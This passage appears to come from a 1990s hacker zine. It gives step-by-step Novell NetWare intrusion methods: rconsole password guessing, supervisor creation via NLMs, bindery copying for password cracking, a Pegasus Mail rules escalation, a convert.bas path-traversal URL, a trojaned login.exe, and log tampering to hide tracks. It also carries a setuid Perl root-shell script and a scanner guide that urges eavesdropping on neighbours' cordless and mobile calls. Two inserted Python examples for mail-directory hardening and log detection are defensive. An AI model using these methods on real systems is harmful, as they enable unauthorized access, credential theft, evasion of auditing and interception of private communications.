easily become supervisor. The only problem is that all users will become
supervisors.

Attacking the Console through Rconsole
--------------------------------------

  1. Login as guest, or any user, and check if accounting is installed.

  2. Load rconsole; sometimes this requires supervisor rights, depending on
     the version of rconsole you are using.

  3. Attempt the password; "remote", "/p=" or "/s=" are often used. It
     should be noted that if you can capture an rconsole session with an
     ethernet analyser, the rconsole password can be extracted. Refer to
     rconfaq.zip below.

  4. Once you have the correct password, type "modules" and view what is
     loaded. If conlog.nlm is loaded, unload it. Get a feel for what is
     loaded; "config" will tell you what protocols are loaded.

  5. Load burglar.nlm or setpwd.nlm to create a new user or change the
     password of another.

  6. If conlog was not loaded, "load delay 30 cls", so that when you exit
     rconsole no tracks are left on the screen.

  7. Exit rconsole, login and do what you will.

  8. Clean the logs: sys:system\sys$log.err. Delete and purge any NLMs you
     loaded.

  9. If conlog was loaded, enter rconsole; downing the server is an option
     to clear the log file.
Cracking the Bindery Files
--------------------------

  FS3/SYS:SYSTEM
  Files:             Size    Last Updated    Flags                 Owner
  ----------------- ------- --------------- --------------------- ----------
  NET$OBJ  SYS        7,360  2-09-96 11:30p [Rw-A-HSy-T--------]  SUPERVISOR
  NET$PROP SYS       25,364  2-09-96 11:30p [Rw-A-HSy-T--------]  SUPERVISOR
  NET$VAL  SYS      108,914  2-12-96 10:23a [Rw-A-HSy-T--------]  SUPERVISOR

These are the bindery files for Novell Netware and, despite somewhat
unpopular belief, it is possible to crack passwords unix style by obtaining
them, just as you would with a copied /etc/passwd. NET$VAL.SYS is the one
holding the encrypted passwords (step 3 of the login sequence above), so it
is the file you cannot do without.

How to close and copy the bindery files. Create the following batch file:

  @echo off
  bindclos
  cd \system
  flag net$obj.sys -hsyt
  flag net$prop.sys -hsyt
  flag net$val.sys -hsyt
  copy net$obj.sys a:\
  copy net$prop.sys a:\
  copy net$val.sys a:\
  flag net$obj.sys +hsyt
  flag net$prop.sys +hsyt
  flag net$val.sys +hsyt
  bindopen

Note that bindclos and bindopen are part of the JRButils. Also, closing and
opening the bindery creates entries in the log file in sys:system (see the
"Bindery close requested by user ..." entries under error logs below). The
problem here is that the sys:system directory is restricted.

Syscon - Clear text passwords
-----------------------------

Older versions of SYSCON, like the one shipped with NetWare 3.11 (version
3.62, I believe), encrypt the passwords so they are not in clear text across
the network. The version that ships with NetWare 3.12 (3.75) certainly does
not encrypt the passwords, therefore passwords set through it can be
captured by ethernet sniffers.

Pmail
-----

--- From a local source ---

Subject: Re: students breaking into network through pmail

I would recommend creating a rules.pmq file in all users' mail directories
to prevent this. Even if a user doesn't have supervisor rights, you could
have the program do a number of things. If nothing else, they could have the
user delete all the mail files. The easiest way that I could think of doing
this would be to create a rules.pmq file and then copy it into each user's
mail directory.
This could be done by creating a dummy rules.pmq file and using a program
like PC Magazine's sweep program:

  F:\MAIL>sweep if not exist rules.pmq copy \mail\1\rules.pmq

I don't know if creating a zero byte rules.pmq would work with Pegasus. It
might not like a zero byte file, and you can copy a zero byte file. Perhaps
it would be best to have Pegasus Mail create an empty rules file if one
doesn't exist, to prevent this. That would be the easiest thing to totally
solve the problem.

> I have recently caught a student using the following procedure:
>
> Create a rules.pmq in their own account that sets up a rule to execute a
> program on receipt of any mail. The program run line is
>
>   COMMAND /C H:\MAIL\<target user's mail dir>\gotya.bat
>
> They then copy this rules.pmq into a user's mail directory (ONLY WORKS IF
> THE USER DOES NOT HAVE A RULES.PMQ ALREADY). They then create a gotya.bat
> in the target user's mail directory to do anything they want.
>
> I tested and was able, using the guest account which has C rights in the
> mail dir, to copy John Baird's (JRB UTILS) SETEQUIV into a supervisor
> equiv's mail directory, plus a batch file which, when run, would change
> guest to be a supervisor equivalent. Copied a rules.pmq to run this batch
> file, then delete all related files.
>
> When the super equiv read their mail (as I watched!) the screen went
> black as the rules were processed and then carried on. No indication of
> what had been done to the super user, but guest had super rights.
>
> Has anyone else tried this or seen this? The only way to stop this was
> to copy an empty RULES.PMQ into each user's mail dir.

--- End excerpt ---

Problems with the netware http
------------------------------

Subject: *** SECURITY ALERT ***

I spent some time exploring Novell's HTTP server and out of the box there
is a CGI that is VERY VERY INSECURE!!!
If you are running the Novell HTTP server, please disable the CGI's it comes
with until you understand (fully understand) what the security risks are.

The CGI in question is convert.bas (yes, CGI's in BASIC, stop laughing).
(There may be more CGI's in the scripts dir that can be exploited but this
was all I could stomach.)

A remote user can read any file on the remote file system using this CGI.
This means that if you are running the Novell HTTP server and have the 'out
of box' CGI's, you are breached.

Exploit code:

  http://victim.com/scripts/convert.bas?../../anything/you/want/to/view

How a Uebercracker keeps his rights
===================================

Trojaning the Netware Login Process
-----------------------------------

If you have attained supervisor status, it is relatively easy to trojan the
login process to reveal all users' passwords to any user. This is done
through two utilities written by itsme: a replacement login.exe, and
prop.exe, which creates a property in the bindery to hold the clear
passwords. Here is the process:

  1. Note the original login.exe's file dates and owner.
  2. Copy the trojaned login.exe to the sys:login directory, and use filer
     to change the file's dates and owner to those of the original
     login.exe.
  3. Flag the trojaned login.exe "ros" through "flag login.exe +sro".
  4. Run "prop -c" from a floppy disk to create the new property.
  5. Purge the original login.exe.
  6. At any time, with any rights, "prop -r" will retrieve a list of users
     and passwords.

Super.exe
---------

Allows a user to switch supervisor equivalence on and off. The user must
already be supervisor equivalent the first time it is used. Super changes
the user's bindery entry under NW 2.x and 3.1x up to 3.11 to allow it to
toggle supervisor equivalence. Under 3.12 Novell prevented this
modification, so instead Super makes the user a manager of both Supervisor
and his/her own usercode.
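Both mail-directory attacks earlier in this article (the LOGIN script dropped
into SYS:MAIL\1 and the Pegasus RULES.PMQ) work only while the target's
MAIL\<id> directory lacks that file, since EVERYONE's Create right lets anyone
supply one. Here is an added example (mine, not from the article or from the
admin excerpt) that audits a mail tree for the missing guard files and creates
empty ones where they are absent, which is the fix the excerpt proposes with
sweep. It runs against a constructed scratch tree here; for real it would be
run as Supervisor against the mapped SYS:MAIL. The excerpt's caveat stands:
if Pegasus rejects a zero-byte RULES.PMQ, replace the placeholder with a valid
empty ruleset.

```python
"""Audit and harden SYS:MAIL user directories (added example, not code from
the article). The demo tree is constructed in a temporary directory."""
from __future__ import annotations
import re
import tempfile
from pathlib import Path

GUARD_FILES = ("LOGIN", "RULES.PMQ")
OBJECT_ID = re.compile(r"^[0-9A-F]{1,8}$", re.I)   # mail dirs are bindery object IDs in hex


def user_mail_dirs(mail_root: Path) -> list[Path]:
    """SYS:MAIL\\1, SYS:MAIL\\C0003043, ...; anything else is not a mailbox."""
    return sorted(p for p in mail_root.iterdir() if p.is_dir() and OBJECT_ID.match(p.name))


def _has(dirpath: Path, name: str) -> bool:
    # NetWare names are case-insensitive; be tolerant of DOS vs Unix test trees.
    return any(p.name.upper() == name for p in dirpath.iterdir())


def audit_mail_dirs(mail_root: Path) -> dict[str, list[str]]:
    """Object ID -> guard files missing. Each missing file is an open door."""
    findings: dict[str, list[str]] = {}
    for d in user_mail_dirs(mail_root):
        missing = [g for g in GUARD_FILES if not _has(d, g)]
        if missing:
            findings[d.name.upper()] = missing
    return findings


def harden_mail_dirs(mail_root: Path) -> list[str]:
    """Create zero-length LOGIN and RULES.PMQ where absent, never overwriting
    a real one. Returns the files created, relative to mail_root."""
    created: list[str] = []
    for d in user_mail_dirs(mail_root):
        for g in GUARD_FILES:
            if not _has(d, g):
                (d / g).touch()
                created.append((d / g).relative_to(mail_root).as_posix())
    return created


def demo() -> dict:
    """Constructed SYS:MAIL: Supervisor (1) unprotected, a user with only a
    LOGIN script, and a non-mailbox directory that must be left alone."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "1").mkdir()
        (root / "C0003043").mkdir()
        (root / "C0003043" / "LOGIN").write_text("MAP DISPLAY OFF\n")
        (root / "LOSTFILES").mkdir()
        before = audit_mail_dirs(root)
        created = harden_mail_dirs(root)
        after = audit_mail_dirs(root)
        preserved = (root / "C0003043" / "LOGIN").read_text()
    return {"before": before, "created": created, "after": after, "preserved": preserved}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:10} {v}")
```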
Where are those error logs and what do they log?
------------------------------------------------

Part of this is taken from the Edinburg Tech Library.

  FS3/SYS:SYSTEM
  Files:             Size    Last Updated    Flags                 Owner
  ----------------- ------- --------------- --------------------- ----------
  SYS$LOG  ERR       78,684  2-09-96 11:30p [Rw-A--------------]  SUPERVISOR
                                            78,684 bytes in 1 files
                                            81,920 bytes in 20 blocks

System error log. This file is an ascii file and is readable by any standard
editor or viewer. It can be read from within SYSCON / Supervisor Options /
View File Server Error Log. After reading, press ESCAPE to exit; you will be
prompted to clear the error log, answer yes or no. It contains entries of
events such as Intruder Lockouts, volume mounts and dismounts, bindery opens
and closes, time changes and remote console connections (see the examples
below).

A better way to edit log files is to load "filer" before you edit the file.
Note the dates created and last accessed, and who owns the file. Then edit
the file, re-enter filer and change the dates/owner back to the originals.

Here are some example entries in the system log:

  8/19/95 1:29:22 pm Severity = 4. 1.1.136
  FS3 NetWare Copyright Violation! Call SUPERVISOR! Server at address
  FACADE99:000000000001 also has my serial number

  12/14/95 1:03:01 pm Severity = 0. 1.1.110
  System time changed by station 25 to 12/14/1995 12:52:48 pm

  2/8/96 11:30:43 pm Severity = 0. 1.1.63
  Bindery close requested by user BACKUP on station 34

  2/8/96 11:30:45 pm Severity = 0. 1.1.61
  Bindery open requested by user BACKUP on station 34

  2/9/96 2:08:13 pm Severity = 0. 0.0.0
  Remote Console Connection Granted for 00000002:0000E8CF7661

  2/9/96 2:08:24 pm Severity = 0. 0.0.0
  Remote Console Connection Cleared for 00000002:0000E8CF7661

Note the bindery close/open pair: that is exactly what the bindclos/bindopen
batch file above leaves behind, and the remote console entries record the
network:node address of whoever used rconsole.

  FS3/SYS:SYSTEM
  Files:             Size    Last Updated    Flags                 Owner
  ----------------- ------- --------------- --------------------- ----------
  NET$ACCT DAT       34,528  2-12-96  3:00p [RwSA-----T--------]  FS3
                                            34,528 bytes in 1 files
                                            36,864 bytes in 9 blocks

Netware audit trail.
If accounting is installed on the server then all logins and logouts are
recorded here, along with disk reads and writes if charging is in force.
Note the file is flagged with a T, meaning transactional file, and cannot be
deleted while this attribute is set. To remove the flag:

  flag net$acct.dat -t

and then delete the file. The system will generate a new file, flagged
appropriately, at the time of the next event.

  FS3/SYS:
  Files:             Size    Last Updated    Flags                 Owner
  ----------------- ------- --------------- --------------------- ----------
  TTS$LOG  ERR        7,828  2-02-96  1:16p [RwSA--------------]  SUPERVISOR
                                            7,828 bytes in 1 files
                                            8,192 bytes in 2 blocks

Here are some example entries in the transactional log:

  Friday February 2, 1996 1:17:50 pm
  TTS has been shut down

  Friday February 2, 1996 1:16:23 pm
  Initializing Transaction Tracking System

  FS3/SYS:
  Files:             Size    Last Updated    Flags                 Owner
  ----------------- ------- --------------- --------------------- ----------
  VOL$LOG  ERR       14,009  2-02-96  1:16p [RwSA--------------]  SUPERVISOR
                                            14,009 bytes in 1 files
                                            16,384 bytes in 4 blocks

In the root of each volume there exists an ascii file vol$log.err. This
records the date and time of the last known good mount of that particular
volume. Where a volume mount is not preceded by a volume dismount (assuming
this is not the start of a new file), this is an indication that a server
crash or abend has occurred. Here are some example entries in the volume
log:

  Volume SYS mounted on Monday August 7, 1995 4:43:52 pm.
  Volume SYS mounted on Monday August 7, 1995 5:17:01 pm.

sys:etc\console.log

A site running conlog.nlm will have a console log file, by default
sys:etc\console.log. This file logs all activity on the console. While
conlog.nlm is loaded the log file shows as zero bytes and can be typed but
not edited. To edit the log file, the NLM must be unloaded from the console.
When downing the server, if conlog has not been unloaded an error message is
sent to the console.
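To get some use out of SYS$LOG.ERR before someone cleans it with filer, here
is an added example (mine, not from the article) that parses entries in the
two-line format shown above and raises alerts for the events this article
teaches you to cause: bindery close requests by anyone other than the backup
account, remote console connections from nodes not on a list, system time
changes and the duplicate serial number warning. The wording matched for the
intruder lockout entry and the two whitelists are assumptions; the sample log
is constructed from the entries shown above.

```python
"""SYS$LOG.ERR parser and detections (added example, not code from the
article). The sample log is constructed from the entries shown above."""
from __future__ import annotations
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable

SAMPLE_LOG = """\
8/19/95 1:29:22 pm Severity = 4. 1.1.136
FS3 NetWare Copyright Violation! Call SUPERVISOR! Server at address FACADE99:000000000001 also has my serial number
12/14/95 1:03:01 pm Severity = 0. 1.1.110
System time changed by station 25 to 12/14/1995 12:52:48 pm
2/8/96 11:30:43 pm Severity = 0. 1.1.63
Bindery close requested by user BACKUP on station 34
2/8/96 11:30:45 pm Severity = 0. 1.1.61
Bindery open requested by user BACKUP on station 34
2/9/96 2:08:13 pm Severity = 0. 0.0.0
Remote Console Connection Granted for 00000002:0000E8CF7661
2/9/96 2:08:24 pm Severity = 0. 0.0.0
Remote Console Connection Cleared for 00000002:0000E8CF7661
"""

# "date time Severity = n. x.y.z" header; the next non-blank line is the message.
HEADER_RE = re.compile(
    r"^(?P<date>\d{1,2}/\d{1,2}/\d{2})\s+(?P<time>\d{1,2}:\d{2}:\d{2}\s+[ap]m)"
    r"\s+Severity\s*=\s*(?P<sev>\d+)\.\s+(?P<code>\S+)\s*$", re.I)


@dataclass(frozen=True)
class Entry:
    when: datetime
    severity: int
    code: str
    message: str


@dataclass(frozen=True)
class Alert:
    kind: str
    when: datetime
    detail: str


def parse_sys_log(text: str) -> list[Entry]:
    entries: list[Entry] = []
    header = None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = HEADER_RE.match(line)
        if m:
            header = m
        elif header is not None:
            stamp = f"{header['date']} {header['time'].upper()}"
            when = datetime.strptime(stamp, "%m/%d/%y %I:%M:%S %p")
            entries.append(Entry(when, int(header["sev"]), header["code"], line.strip()))
            header = None
    return entries


def detect(entries: Iterable[Entry], bindery_users: frozenset[str] = frozenset(),
           console_nodes: frozenset[str] = frozenset()) -> list[Alert]:
    """bindery_users: accounts allowed to close the bindery (backup software).
    console_nodes: network:node addresses allowed to use RCONSOLE."""
    alerts: list[Alert] = []
    for e in entries:
        msg = e.message
        if m := re.search(r"Bindery close requested by user (\S+) on station (\d+)", msg):
            if m.group(1).upper() not in bindery_users:
                alerts.append(Alert("bindery_close", e.when, f"{m.group(1)} station {m.group(2)}"))
        elif m := re.search(r"Remote Console Connection Granted for (\S+)", msg):
            if m.group(1).upper() not in console_nodes:
                alerts.append(Alert("rconsole", e.when, m.group(1)))
        elif m := re.search(r"System time changed by station (\d+)", msg):
            alerts.append(Alert("time_change", e.when, f"station {m.group(1)}"))
        elif m := re.search(r"Server at address (\S+) also has my serial number", msg):
            alerts.append(Alert("duplicate_serial", e.when, m.group(1)))
        elif re.search(r"intruder", msg, re.I):     # exact lockout wording assumed
            alerts.append(Alert("intruder_lockout", e.when, msg))
    return alerts


def rconsole_sessions(entries: Iterable[Entry]) -> list[tuple[str, datetime, timedelta | None]]:
    """Pair Granted/Cleared lines per address into (address, start, duration);
    duration is None for a session still open at the end of the log."""
    open_: dict[str, datetime] = {}
    sessions: list[tuple[str, datetime, timedelta | None]] = []
    for e in entries:
        if m := re.search(r"Remote Console Connection (Granted|Cleared) for (\S+)", e.message):
            state, addr = m.group(1), m.group(2)
            if state == "Granted":
                open_[addr] = e.when
            elif addr in open_:
                start = open_.pop(addr)
                sessions.append((addr, start, e.when - start))
    sessions.extend((addr, start, None) for addr, start in open_.items())
    return sessions


if __name__ == "__main__":
    log = parse_sys_log(SAMPLE_LOG)
    for a in detect(log, bindery_users=frozenset({"BACKUP"})):
        print(a.when, a.kind, a.detail)
    print(rconsole_sessions(log))
```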
To defeat console logging, down the server with the following commands:

Remove Dos
Down
Exit

This works because console.log is deleted and re-created every time conlog is loaded.

A listing of what some utilities can do to penetrate Novell NetWare
-------------------------------------------------------------------

Trojan the NetWare login process
NetWare password cracker that encrypts password attempts
Key stroke logger
Delays NLM commands on the console
Check for null passwords
How to break the rconsole encryption
Break the rconsole encryption
Create a super-user from the console
Change any user's password from the console
Become super-user on 3.11 without Packet Signatures
Grant super rights, then allow them to be toggled
Create a temporary file server
Remove the delete inhibit flag
Play with NetWare's bindery

There is a set of utilities called the JRButils, the latest version being V2.30.

Please send comments or suggestions to diceman@fl.net.au

._________________________________________________________________________.

-= CERT Advisory Snippet Issue #1
-= Perl Exploit

The relevant CERT Advisory is CA-96.12. The vulnerability results in anyone with access to an account gaining root access. Within the next issue, there should be a detailed explanation of the exploit.

<------------------------------- cut ---------------------------------------->
#!/usr/bin/perl -U
# Remember to chmod 4755
#
# This exploit is a little aged although it might work.
#
$ENV{PATH}="/bin:/usr/bin";
$>=0;
$<=0;
exec("/bin/bash");
<------------------------------- cut ---------------------------------------->

Every month we will be investigating recent CERT advisories & reporting back the bugs & the patches.

.____________________________________________________________________________.
/-\./-\./-\./-\./-\./-\
|  Scanning Made Easy  |
|       By Myst        |
\-/.\-/.\-/.\-/.\-/.\-/

This is an article to help you novice scanner people out there get the most when buying and using your scanner (I don't mean picture scanning either ;)

-= What are scanners? =-

Scanners are devices used to receive all those wonderful radio signals that pass through our bodies every second of every day. They are capable of receiving only, and therefore are NOT illegal (although some scanners which can reach the mobile phone frequencies are now considered illegal). They allow the user to hear the wonders of the city around them before the news and radio stations even know what's going on. By listening in to the police (not illegal :), fire departments, Telstra and even TV stations etc. you are able to hear all the latest and greatest news.... car crashes, armed robbery, domestic disputes, even hear the cops bitchin' over who ate the last doughnut :)

-= Where can I get one of these wonderful devices? =-

Well, if you're the rich and lazy type, try your local Dick Smith store (what don't they hold?? :), or if you prefer to get something a little more worth the value, try speciality shops that stock amateur radio equipment; they are bound to have better prices, but you never know, shop around a bit first. You can even order them off the Internet (I think), but that's at your own risk. It is also possible that some old (often still good value) scanners are available at HAM conventions. This is basically just a get-together of amateur radio guys/gals to sell off old equipment and have some fun on the activities. Even look in the paper, you just never know (new scanners are made not to access the mobile phone frequencies, but the older ones still can, so they are sometimes a better buy).

-= What should I look for when buying a scanner? =-

Well, it does kinda depend on the price range and whether you want a portable or base station type (portables can be taken with you on your trips around the world, whereas a base station is placed at one location and usually not moved). The major pro with portables is that they are usually cheaper and can be taken to sporting events etc., but they often compromise a bit on the quality and clarity of the signal (this also depends on the brand of scanner and the antenna in use). Because base stations are rarely moved around, it is wise to have a mounted antenna somewhere on your roof. This gives better range and is especially good for picking up those city transmissions from out in the country. This often makes base station models a wiser choice, but there is nothing stopping you from using a roof-mounted scanning antenna with your portable whilst at home, and then a little rubber duckie (flexible antenna, for those who don't know) or similar whilst outside soaking up the sun. Also, base stations often have extra features that are not found on some portable models. Sum up your own needs and decide which would be better for you.

-= What brand should I get? =-

Generally stick with Uniden, Cobra etc. It again depends on price and the functions you may want (see below). Ask around a bit and see what the dealers can do for you. Generally radio equipment is always pretty good on the quality side, but like always there are some that don't quite cut it.

-= What functions are available in scanners? What functions will I want? =-

Most (all?) scanners have the ability to store frequencies. You WILL want this. It is pretty much a standard thing. The older models start off with a 16 channel memory, with some of the later models having 100, 300 or even 500 channel capacities. You program these memory channels with desired frequencies, then you can make your scanner scan them for any activity. Different model scanners can scan these memories faster than others.
Other important features include:

Data Skip - This feature allows the scanner to skip over unwanted data transmissions and substantially stops you from hearing interference or annoying signals.

Priority Channels - These are programmed with the most important frequencies. Then, whilst monitoring other stuff, the scanner can be made to check these for activity automagically every few seconds. Useful feature.

Programmable Searching - This allows you to search between two frequencies for activity.

Channel Lock Out - Lock channels so that they are not scanned.

Automatic Store - Automatically searches out and stores active frequencies to an available channel location, then automatically returns to find the next active frequency.

Plus I am sure there are other features, depending upon the make and model. Ask the sales guy if you're not sure. Hell, that's what they are there for :)

-= I have a scanner, but now what? =-

OKEY! You have a scanner, let's get on the road! But wait, you don't want to sit around all day searching for 'interesting' frequencies to watch, that could take forever. Luckily for us, there are people in this world who either through torture or work (maybe both :) make up frequency lists and distribute them. I know that Dick Smith stocks 'some' frequency books, but these you have to pay for (who wants to pay for things in this world?), so check with local bulletin boards, the Internet (NO, not that word again ;), friends, relatives, strangers, leave messages, you get the picture. Eventually you *WILL* find frequencies for your area. If you live in or near a major city, then I can guarantee you that there are frequency lists for your area. I will even include some with this article (I am a generous kind of guy). You want frequencies! Then frequencies you will get!

First a few rules to 'safe' scanning, yes they must be told :)

* Don't get in the way of emergency people! If you hear of a fire or whatever, think twice before rushing out and getting in the way. Just use your brain, that's all I am saying :)
* Don't poke your rubber duckie antenna in your eye (yes, they do hurt ;)
* Computers and the like can interfere majorly with the operation of scanners, causing unwanted interference, so generally keep them separated.
* Always strap your scanner on your side before leaving the house, unless you plan on going to:
  1. Your girlfriend's house
  2. A party
  3. A fun park
  4. Anywhere you might end up pissed :)

Now, on with the list! These are just frequencies I have collected from numerous sources over the years. I don't guarantee any of them. Most are fairly recent though and *should* work. This is by far not a complete list (it comes nowhere close). To find more comprehensive lists, try the web/ftp links at the bottom of the article.

-= POLICE =-

123.100            VKC      MELBOURNE
123.200            VKC      MELBOURNE
131.600            VKC      MELBOURNE
156.375            VKC      MELBOURNE
156.675            VKC      MELBOURNE
156.725            VKC      MELBOURNE
168.250            VKC      MELBOURNE
168.400            VKC      MELBOURNE
413.975            VJV434   MELBOURNE
450.525            VKC      MELBOURNE
450.650            VKC      MELBOURNE
450.675            VKC      MELBOURNE
468.000 - 470.000  VKC      MELBOURNE
852.7875           VKC      MELBOURNE

PERTH (all of the following):
467.850  467.875  467.900  467.925  467.950  467.975  468.000  468.025
468.050  468.075  468.100  468.125  468.150  468.175  468.200  468.225
468.250  468.275  468.300  468.325  468.350  468.375  468.400  468.425
468.450  468.475  468.500  468.525  468.550  468.575  468.600  468.625
468.650  468.675  468.700  468.725  468.750  468.775  468.800  468.825
468.850  468.875  468.900  468.925  468.950  468.975  469.000  469.025
469.050  469.075  469.100  469.125  469.150  469.175  469.200  469.225
469.250  469.275  469.300  469.325  469.350  469.375  469.400  469.425

468.400  SYDNEY
468.525  SYDNEY
468.950  SYDNEY
468.450  NTH SYDNEY
468.200  NTH SYDNEY
468.925  NTH SYDNEY
468.725  SYDNEY
467.900  SYDNEY
469.300  SYDNEY
468.075  SYDNEY
467.950  SYDNEY
468.750  SYDNEY
468.700  SYDNEY
468.000  SYDNEY
468.425  SYDNEY
469.275  SYDNEY
468.675  SYDNEY
468.375  SYDNEY
468.550  SYDNEY
469.075  SYDNEY
468.475  SYDNEY/CAR 2 CAR
468.775  SYDNEY/CAR 2 CAR

458.950  Alice Springs / N.T.
458.975  Alice Springs / N.T.
468.450  Alice Springs / N.T.
468.475  Alice Springs / N.T.

-= AMBULANCE =-

412.5000  VL3NE   MELBOURNE
412.5250  VH3HYA  MELBOURNE
412.7500  VL3NE   MELBOURNE
413.0750  VL3NE   MELBOURNE
413.3500  VL3NE   MELBOURNE
413.4250  VL3WX   MELBOURNE
470.4000  VM3SJ   MELBOURNE
470.9750  VM3SJ   MELBOURNE
453.825   Northern Territory
454.125   Northern Territory
462.950   Alice Springs
463.325   Northern Territory
463.625   Alice Springs

-= FIRE BRIGADE =-

458.275  MELBOURNE
457.975  MELBOURNE
457.375  MELBOURNE
455.575  MELBOURNE

-= Mobile Phonez! =-

Okey, I don't have much info here, except the stuff from personal experience. For starters, every scanner sold nowadays will not go within the mobile phone range, so you might need to look around for some older models, but make sure to check in the manuals whether or not they can reach up to the 800 - 900MHz range. Many amateur radio handhelds and others can also get into the mobile area (if you have your amateur licence, of course). Only analog phonez can be heard on scanners (digital ones make use of encryption techniques, so they can be picked up, just not understood). The only frequency range I have experienced mobiles on is between 914.000 and 931.000. The mobile towers seem to pick a frequency in this range depending upon the amount of traffic or whatever, so there is no set frequency that you can always find the phones on. Scan between those two continuously and you are bound to get something (in my area anyway).
I have no idea whether these are different in other cities (someone may want to help me out with all this). Just try it and see what you get. Also, it is common (where I live anyway) for the phones to 'drop out' while someone is in the middle of a conversation and go to another frequency. A series of 'beeps' is heard a minute or so before this happens. The only explanation I have for this is that the mobile phone comes closer to a different cell and so switches (the new cell choosing a different frequency). Someone wanna help me out here too? I think I need to do a Telstra course or something :)

-= Amateur Radio Repeaters =-

These are sometimes interesting to listen to (I emphasise the 'sometimes' :). Instead of re-typing all these out, you can find them in the back of your handy 'ol Dick Smith book. Also contained in that book are the UHF CB repeater listings and various other stuff. Repeaters are just devices that pick up an input signal on one frequency and then re-transmit that signal with higher power on another frequency. This allows someone with only a small handheld radio to be picked up by someone a hundred km away.

-= Telstra Stuff =-

I don't have any! I want some! Can someone please give me some info on Telstra's frequencies, like the ones used by the repair crews etc. (preferably for Melbourne, but hey, I'll take what I can get :)

-= Airports =-

Whenever you go to an airport TAKE YOUR SCANNER. They're a great place for all sorts of interesting transmissions. For instance: the planes, air traffic controllers, ground people (including refuelling trucks etc.), P.A. systems, weather reports plus more! You might even be able to hear some of the radars active - ground, long distance etc.
118.200  Avalon Airport
120.100  Avalon Airport
314.600  Avalon Airport
130.600
130.650  Ansett / Tullamarine
130.950  Ansett / Tullamarine
461.425  Ansett / Tullamarine
463.675  Ansett / Tullamarine
470.175  Ansett / Tullamarine
471.925  Ansett / Tullamarine
131.900  Qantas / Tullamarine
166.660  Qantas / Tullamarine
461.100  Qantas / Tullamarine
464.950  Qantas / Tullamarine
465.625  Qantas / Tullamarine

Most airport activity seems to be between the 120.000 and 135.000 range.

-= FUN STUFF =-

< Cordless Telephones - Hear your neighbours >

Base Unit Only:
30.075  30.100  30.125  30.150  30.175  30.200  30.225  30.250  30.275  30.300

Also try these:

Base    Handset
43.72   48.76
43.74   48.84
43.82   48.86
43.84   48.92
43.92   49.02
43.96   49.08
44.12   49.10
44.16   49.16
44.18   49.20
44.20   49.24
44.32   49.28
44.36   49.36
44.40   49.40
44.46   49.46
44.48   49.50
46.61   49.67
46.63   49.845
46.67   49.86
46.71   49.77
46.73   49.875
46.77   49.83
46.83   49.89
46.87   49.93
46.93   49.99

< CB's (Who'd wanna listen to them anyway) >

Ch  Freq      Ch  Freq      Ch  Freq      Ch  Freq
01  26.965    11  27.085    21  27.215    31  27.315
02  26.975    12  27.105    22  27.225    32  27.325
03  26.985    13  27.115    23  27.255    33  27.335
04  27.005    14  27.125    24  27.235    34  27.345
05  27.015    15  27.135    25  27.245    35  27.355
06  27.025    16  27.155    26  27.265    36  27.365
07  27.035    17  27.165    27  27.275    37  27.375
08  27.055    18  27.175    28  27.285    38  27.385
09  27.065    19  27.185    29  27.295    39  27.395
10  27.075    20  27.205    30  27.305    40  27.405

< McDonalds - Drivethru staff >

These are pretty low powered things, so don't expect to get them from your house (unless, god forbid, you live next door to a McDonalds store). So get about half a kilometre away at the most (200 metres might be better). Also, some of the stores may use simplex systems (transmit on one frequency, receive on another). Just see how things go.
30.840
31.000
33.140
35.020  -- Try this one first
40.430
151.715
151.775
151.895
154.060
154.570
154.600
154.700
165.600
169.445
467.775
457.550

McDonalds Wireless Mic Freqs:
170.245
170.305
171.105
171.905

Another great trick with these is to find the frequency of the mic you talk into and turn your scanner right up on this frequency. Put it close to your window, then go through the drivethru. When the lady/man asks for your order and you speak, a nice lot of feedback is sent to them :) Could be fun (thanx to BlkGriff for that idea, although some others did mention it as well).

< Kids Walkie Talkies >

Some of these operate on AM, generally somewhere close to the CB frequencies. Some also operate on FM, close to 50 MHz (sometimes it is written on the back of the units). Anything that creates RF energy can be received. So get out that old Jet Hopper controller, scan for your computer, probably even your microwave..

-= MiSc INfo =-

< POLICE >

If you hear a short burst of 2000Hz tone it means:
1 tone : memo for all cars
2 tones: hold up alarm or serious crime
3 tones: officer needs urgent help

Also, the police use a code system to abbreviate things, e.g. "Car 301 code 1". The list of codes I have is about 3 years old, but here it is:

 1  On Patrol                       24  Suspect on premises
 2  In Office                       25  Suspect disturbed
 3  At Station                      26  Brawl
 4  Away vehicle check              27  License offence
 5  Away premises check             28  Omission Signal
 6  At Court                        29  Gaming Offence
 7  Mobile to office                30  Drunk
 8  Mobile to residents             31  Operational exercise
 9  ?                               32  Drowning
10  Domestic disturbance            33  Deceased
11  Armed suspect                   34  Wilful Damage
12  Vehicle accident                35  Knifing
13  Ambulance                       36  Larceny (Theft)
14  Assault and robbery             37  ?
15  Alarm - silent                  38  ?
16  Ambulance required              39  Suspicious vehicle
17  Alarm - audible                 40  Fingerprints
18  Assault                         41  ?
19  Officer requires assistance     42  Escapee - Military
20  Burglary                        43  Fire
21  Vessel in trouble               44  ?
22  Provide transport               45  Escapee - Mental
23  Peeping Tom                     46  Drunk driver

47  Escapee - Civilian              60  Incident at ...
48  Explosion                       69  Homicide
49  ?                               70  Smash and grab
50  Breaking                        71  Special duty
51  Indecent exposure               73  Robbery
52  ?                               74  Rape
53  Hit & Run                       78  Loitering
54  ?                               79  Shooting
55  Indecent assault                80  Warrant at ..
56  ?                               81  Wanted, detain
57  ?                               86  Wanted: Felony
58  Indecent behaviour              87  Wounding
59  ?                               88  Wanted: warrant for misd

97  Plane overdue
98  Plane crash impending
99  Plane crash..

Car numbers:

200  Station car                    400-449  Boat Squad
300  Divisional Van                 470-499  Air wing
400  Crime car                      500-539  Licensing
500  C.I.B                          100----  Exercise/Inspector
600  Community Policing             560-569  Gaming
700  Special Duty/Solo              570-599  Vice
800  Foot Patrol                    600-699  Women
900  Station radio

-= Other Info =-

If you have Internet access, then you can do searches for frequency lists. Just use InfoSeek or something similar. Here are some scanner links that might be of interest:

Links to scanner related pages - http://www.li.net/~j4dice/links.html
TBSA Frequency Guide - http://www.tbsa.com.au/locvic.html
Stoopid Scanner Tricks - http://exo.com/~rbarron/
Glen's Links - http://www.geocities.com/SiliconValley/5019/

Also check out the TBSA Frequency Guide FTP site: ftp.tbsa.com.au /pub/scan

